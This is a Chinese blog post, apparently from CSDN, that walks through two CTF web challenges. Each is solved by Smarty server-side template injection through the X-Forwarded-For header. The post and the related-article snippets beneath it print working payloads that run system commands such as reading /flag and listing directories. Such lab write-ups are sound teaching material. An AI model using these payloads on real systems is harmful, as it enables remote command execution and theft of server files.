The mystery of ip/[CISCN2019 华东南赛区]Web11 关于php下模板注入的思考

最新推荐文章于 2022-03-23 20:56:25 发布
最新推荐文章于 2022-03-23 20:56:25 发布
阅读量184 收藏
点赞数
分类专栏: ctf 文章标签: ctf 模板注入 php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/111870578
版权

1. 题目:The mystery of ip

拿到题目开始并未发现奇怪的地方,有一个flag.php页面会显示出我的ip,hint.php页面源码下有如下提示

<!-- Do you know why i know your ip? -->

因此猜测可能与ip有关,而常见的ip控制方法我们可以想到利用X-Forwarded-For属性,抓包flag.php页面,构造

X-Forwarded-For:127.0.0.1

查看回显,果然ip发生的变化。
在这里插入图片描述
这里尝试进行sql注入,但是无反应,通过翻阅大佬的wp发现这题目是模板注入ssti。确实是第一次遇见,之前都是python下的模板注入。
存在注入的情况下,可以直接执行php函数,如

{if phpinfo()}{/if}

常规的类似于python的写法也是可以的

{{phpinfo()}}

本题没有别的过滤了,因此直接构造payload读取flag

X-Forwarded-For:{{system('cat /flag')}}

成功获取flag
在这里插入图片描述

2 . 题目:[CISCN2019 华东南赛区]Web11

这题和上一道题基本一样,根据提示构造X-Forwarded-For属性,然后执行命令即可。
想要有更多的了解可以看看这位大佬的博客。
https://blog.csdn.net/qq_45521281/article/details/107556915

3. 模板注入的一些特性

常见的注入可以用下图的方法进行测试。
在这里插入图片描述
在这里插入图片描述

fly夏天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华东赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
weixin_45577185的博客
10-16 448
知识点: SSTI smarty X-Forwarded-For Smarty是一个PHP模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。 看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For 发现Current IP更改为相应值 回想到曾经做过的题,用SSTI 发现存在注入 获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
[BJDCTF2020]The mystery of ip(ssti模板注入题目)
m0_55109452的博客
06-02 1833
项目场景: 链接http://node3.buuoj.cn:29669/index.php 问题描述: 观察页面找到三个链接,点开flag和hint看看,发现flag那个页面窃取了客户端的ip地址,这题的题目是“The mystery of ipIP的神秘,看来解题是要从这里入手了。 尝试解决: 既然是窃取了IP,考虑是不是XFF或Client-IP这两个header,发现这个IP确实可控,0.0,感觉可以冲了 我想到的第一个就是之前看到的sql注入的http头注入,但是也只是想想罢了,再看看其他方
[CISCN2019 华东赛区]Web11 1
shinygod的博客
03-23 2832
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做题前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
[CISCN2019 华东赛区]Web11
SopRomeo的博客
05-16 449
看到Smarty,提示是模板注入了, 又提示ip这个东西 直接用X-Forwarded-For测试 存在模板注入, 百度查资料 参考文献 根据参考文献给的poc,直接RCE payload {if system('ls /')}{/if} 可以发现flag在根目录下,但是我们查看不了,可能禁用了指令 我换了个指令show_source(),高亮显示文件 payload {if show_source("/flag")}{/if} ...
buuctf-[BJDCTF2020]The mystery of ip
qq_42728977的博客
12-23 1415
[BJDCTF2020]The mystery of ip考点复现参考 考点 模板注入 复现 看到提示,说是怎么知道我的ip,那就说明应该是该请求头,然后模板注入,然后发现果然是。 在请求头加入X-Forwarded-For: GET /flag.php HTTP/1.1 Host: node4.buuoj.cn:28006 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 A
[BJDCTF2020]The mystery of ip(xff,smarty模板注入)
weixin_44110537的博客
10-04 512
首先服务器是如何知道我的ip的呢,猜想可能是XFF或Client-IP这两个header. 抓个包 发现是通过XFF smarty模板注入 参考了一下这位师傅的博客. PHP模板注入(Smarty模板) 看看flag.php源代码是啥. <?php require_once('header.php'); require_once('./libs/Smarty.class.php'); $smarty = new Smarty(); if (!empty($_SER
[bjdctf2020]the mystery of ip
最新发布
03-16
这是一道关于IP地址的谜题,需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号,我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络...
The Mystery of Legend-开源
06-28
在JRPG(日式角色扮演游戏)风格下,《神秘的传说》可能包含了丰富的剧情、独特的角色设计、复杂的战斗系统和多样化的探索元素。开源的特点使得这些元素可以被爱好者进一步挖掘和扩展,比如通过编写脚本增加新的剧情...
BUUCTF [CISCN2019 华东赛区] Web11
Senimo
12-23 670
BUUCTF [CISCN2019 华东赛区] Web11 考点: 根据页面提示,应该是一个类似IP查询的网站,根据**XXF(X-Forwarded-For)**判断
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值